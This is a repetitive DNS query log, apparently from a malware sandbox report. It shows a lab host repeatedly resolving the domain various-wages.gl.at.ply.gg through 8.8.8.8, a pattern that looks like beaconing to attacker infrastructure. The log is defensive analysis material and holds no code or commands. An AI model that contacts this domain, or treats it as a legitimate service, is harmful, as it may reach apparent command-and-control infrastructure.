                                                            Sep 25, 2024 08:31:39.270939112 CEST192.168.2.228.8.8.80xb898Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.351064920 CEST192.168.2.228.8.8.80xb898Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.508625031 CEST192.168.2.228.8.8.80xe930Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.517237902 CEST192.168.2.228.8.8.80xe930Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.524029970 CEST192.168.2.228.8.8.80xe930Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.535295963 CEST192.168.2.228.8.8.80xe930Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.548677921 CEST192.168.2.228.8.8.80xe930Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.677927017 CEST192.168.2.228.8.8.80xe70dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.685776949 CEST192.168.2.228.8.8.80xe70dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.692437887 CEST192.168.2.228.8.8.80xe70dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.699765921 CEST192.168.2.228.8.8.80xe70dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.715091944 CEST192.168.2.228.8.8.80xe70dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.098179102 CEST192.168.2.228.8.8.80xb7c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.106189966 CEST192.168.2.228.8.8.80xb7c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.112648010 CEST192.168.2.228.8.8.80xb7c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.119259119 CEST192.168.2.228.8.8.80xb7c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.127130985 CEST192.168.2.228.8.8.80xb7c6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.199218035 CEST192.168.2.228.8.8.80xda2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.206470013 CEST192.168.2.228.8.8.80xda2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.214011908 CEST192.168.2.228.8.8.80xda2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.220971107 CEST192.168.2.228.8.8.80xda2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.440063953 CEST192.168.2.228.8.8.80xda2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.569919109 CEST192.168.2.228.8.8.80x6d7eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.577239037 CEST192.168.2.228.8.8.80x6d7eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.584971905 CEST192.168.2.228.8.8.80x6d7eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.597623110 CEST192.168.2.228.8.8.80x6d7eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.609376907 CEST192.168.2.228.8.8.80x6d7eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.719914913 CEST192.168.2.228.8.8.80xce56Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.727653027 CEST192.168.2.228.8.8.80xce56Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.736063004 CEST192.168.2.228.8.8.80xce56Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.744390965 CEST192.168.2.228.8.8.80xce56Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.759186029 CEST192.168.2.228.8.8.80xce56Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.883213997 CEST192.168.2.228.8.8.80xbed1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.891050100 CEST192.168.2.228.8.8.80xbed1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.898062944 CEST192.168.2.228.8.8.80xbed1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.904836893 CEST192.168.2.228.8.8.80xbed1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.911406040 CEST192.168.2.228.8.8.80xbed1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.679301023 CEST192.168.2.228.8.8.80xd005Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.695177078 CEST192.168.2.228.8.8.80xd005Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.703540087 CEST192.168.2.228.8.8.80xd005Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.711508036 CEST192.168.2.228.8.8.80xd005Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.721528053 CEST192.168.2.228.8.8.80xd005Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.848447084 CEST192.168.2.228.8.8.80xbc08Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.855066061 CEST192.168.2.228.8.8.80xbc08Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.862066984 CEST192.168.2.228.8.8.80xbc08Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.871334076 CEST192.168.2.228.8.8.80xbc08Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.878740072 CEST192.168.2.228.8.8.80xbc08Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.355252981 CEST192.168.2.228.8.8.80xeb04Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.363166094 CEST192.168.2.228.8.8.80xeb04Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.369659901 CEST192.168.2.228.8.8.80xeb04Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.377202988 CEST192.168.2.228.8.8.80xeb04Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.384654999 CEST192.168.2.228.8.8.80xeb04Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.513773918 CEST192.168.2.228.8.8.80xb464Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.520693064 CEST192.168.2.228.8.8.80xb464Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.527968884 CEST192.168.2.228.8.8.80xb464Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.535053015 CEST192.168.2.228.8.8.80xb464Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.542382956 CEST192.168.2.228.8.8.80xb464Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.659791946 CEST192.168.2.228.8.8.80xd90eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.666469097 CEST192.168.2.228.8.8.80xd90eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.673145056 CEST192.168.2.228.8.8.80xd90eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.679682016 CEST192.168.2.228.8.8.80xd90eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.687364101 CEST192.168.2.228.8.8.80xd90eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.808154106 CEST192.168.2.228.8.8.80xe0aeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.815854073 CEST192.168.2.228.8.8.80xe0aeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.822923899 CEST192.168.2.228.8.8.80xe0aeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.829657078 CEST192.168.2.228.8.8.80xe0aeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.836905956 CEST192.168.2.228.8.8.80xe0aeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.966521025 CEST192.168.2.228.8.8.80x3c38Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.976900101 CEST192.168.2.228.8.8.80x3c38Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.984211922 CEST192.168.2.228.8.8.80x3c38Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.991391897 CEST192.168.2.228.8.8.80x3c38Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.998315096 CEST192.168.2.228.8.8.80x3c38Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.117619991 CEST192.168.2.228.8.8.80x28edStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.125319958 CEST192.168.2.228.8.8.80x28edStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.132658958 CEST192.168.2.228.8.8.80x28edStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.142416954 CEST192.168.2.228.8.8.80x28edStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.149014950 CEST192.168.2.228.8.8.80x28edStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.273417950 CEST192.168.2.228.8.8.80x1973Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.777626991 CEST192.168.2.228.8.8.80x1973Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.784884930 CEST192.168.2.228.8.8.80x1973Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.791884899 CEST192.168.2.228.8.8.80x1973Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.798356056 CEST192.168.2.228.8.8.80x1973Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.910166979 CEST192.168.2.228.8.8.80x4065Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.917292118 CEST192.168.2.228.8.8.80x4065Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.926439047 CEST192.168.2.228.8.8.80x4065Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.934462070 CEST192.168.2.228.8.8.80x4065Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.942831039 CEST192.168.2.228.8.8.80x4065Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.078936100 CEST192.168.2.228.8.8.80xbc4eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.086422920 CEST192.168.2.228.8.8.80xbc4eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.093384027 CEST192.168.2.228.8.8.80xbc4eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.100316048 CEST192.168.2.228.8.8.80xbc4eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.107409954 CEST192.168.2.228.8.8.80xbc4eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.220227957 CEST192.168.2.228.8.8.80xe2eeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.227137089 CEST192.168.2.228.8.8.80xe2eeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.233932018 CEST192.168.2.228.8.8.80xe2eeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.240926981 CEST192.168.2.228.8.8.80xe2eeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.247844934 CEST192.168.2.228.8.8.80xe2eeStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.543523073 CEST192.168.2.228.8.8.80x7776Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.555141926 CEST192.168.2.228.8.8.80x7776Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.563522100 CEST192.168.2.228.8.8.80x7776Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.570146084 CEST192.168.2.228.8.8.80x7776Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.581866980 CEST192.168.2.228.8.8.80x7776Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.702120066 CEST192.168.2.228.8.8.80xdf2aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.713226080 CEST192.168.2.228.8.8.80xdf2aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.726887941 CEST192.168.2.228.8.8.80xdf2aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.738548994 CEST192.168.2.228.8.8.80xdf2aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.745811939 CEST192.168.2.228.8.8.80xdf2aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.879137993 CEST192.168.2.228.8.8.80x8ad0Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.913266897 CEST192.168.2.228.8.8.80x8ad0Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.921168089 CEST192.168.2.228.8.8.80x8ad0Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.933043957 CEST192.168.2.228.8.8.80x8ad0Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.941206932 CEST192.168.2.228.8.8.80x8ad0Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.060762882 CEST192.168.2.228.8.8.80xfa2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.068185091 CEST192.168.2.228.8.8.80xfa2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.076272964 CEST192.168.2.228.8.8.80xfa2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.084140062 CEST192.168.2.228.8.8.80xfa2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.091139078 CEST192.168.2.228.8.8.80xfa2bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.217261076 CEST192.168.2.228.8.8.80x118bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.226346016 CEST192.168.2.228.8.8.80x118bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.542273045 CEST192.168.2.228.8.8.80x118bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.548674107 CEST192.168.2.228.8.8.80x118bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:03.555229902 CEST192.168.2.228.8.8.80x118bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:07.113037109 CEST192.168.2.228.8.8.80x429cStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:07.120022058 CEST192.168.2.228.8.8.80x429cStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:07.126919985 CEST192.168.2.228.8.8.80x429cStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:07.134341955 CEST192.168.2.228.8.8.80x429cStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:07.141197920 CEST192.168.2.228.8.8.80x429cStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:10.947738886 CEST192.168.2.228.8.8.80xbb59Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:10.955095053 CEST192.168.2.228.8.8.80xbb59Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:10.962294102 CEST192.168.2.228.8.8.80xbb59Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:10.969353914 CEST192.168.2.228.8.8.80xbb59Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:10.977832079 CEST192.168.2.228.8.8.80xbb59Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.069919109 CEST192.168.2.228.8.8.80x68c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.153119087 CEST192.168.2.228.8.8.80x68c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.159812927 CEST192.168.2.228.8.8.80x68c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.166296005 CEST192.168.2.228.8.8.80x68c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.173432112 CEST192.168.2.228.8.8.80x68c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.293781042 CEST192.168.2.228.8.8.80xbbb7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.303070068 CEST192.168.2.228.8.8.80xbbb7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.309731960 CEST192.168.2.228.8.8.80xbbb7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.317019939 CEST192.168.2.228.8.8.80xbbb7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.324862003 CEST192.168.2.228.8.8.80xbbb7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.456705093 CEST192.168.2.228.8.8.80xd3d9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.464051962 CEST192.168.2.228.8.8.80xd3d9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.471337080 CEST192.168.2.228.8.8.80xd3d9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.478084087 CEST192.168.2.228.8.8.80xd3d9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.485557079 CEST192.168.2.228.8.8.80xd3d9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.603153944 CEST192.168.2.228.8.8.80x42f8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.609623909 CEST192.168.2.228.8.8.80x42f8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.616060019 CEST192.168.2.228.8.8.80x42f8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.622440100 CEST192.168.2.228.8.8.80x42f8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.628719091 CEST192.168.2.228.8.8.80x42f8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.743608952 CEST192.168.2.228.8.8.80xc130Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.750909090 CEST192.168.2.228.8.8.80xc130Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.757416964 CEST192.168.2.228.8.8.80xc130Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.764215946 CEST192.168.2.228.8.8.80xc130Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:14.772665977 CEST192.168.2.228.8.8.80xc130Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.787950993 CEST192.168.2.228.8.8.80x4a84Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.800410986 CEST192.168.2.228.8.8.80x4a84Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.806962013 CEST192.168.2.228.8.8.80x4a84Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.813960075 CEST192.168.2.228.8.8.80x4a84Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.820290089 CEST192.168.2.228.8.8.80x4a84Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.944921017 CEST192.168.2.228.8.8.80xd80aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.951287031 CEST192.168.2.228.8.8.80xd80aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.957556009 CEST192.168.2.228.8.8.80xd80aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.963851929 CEST192.168.2.228.8.8.80xd80aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:18.970109940 CEST192.168.2.228.8.8.80xd80aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.079709053 CEST192.168.2.228.8.8.80xf79aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.086484909 CEST192.168.2.228.8.8.80xf79aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.093085051 CEST192.168.2.228.8.8.80xf79aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.100136995 CEST192.168.2.228.8.8.80xf79aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.106643915 CEST192.168.2.228.8.8.80xf79aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.220576048 CEST192.168.2.228.8.8.80x4ab4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.227626085 CEST192.168.2.228.8.8.80x4ab4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.234544039 CEST192.168.2.228.8.8.80x4ab4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.240993977 CEST192.168.2.228.8.8.80x4ab4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:19.247252941 CEST192.168.2.228.8.8.80x4ab4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.291148901 CEST192.168.2.228.8.8.80x7b82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.298451900 CEST192.168.2.228.8.8.80x7b82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.305572987 CEST192.168.2.228.8.8.80x7b82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.312978983 CEST192.168.2.228.8.8.80x7b82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.320132971 CEST192.168.2.228.8.8.80x7b82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:22.431181908 CEST192.168.2.228.8.8.80x2024Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
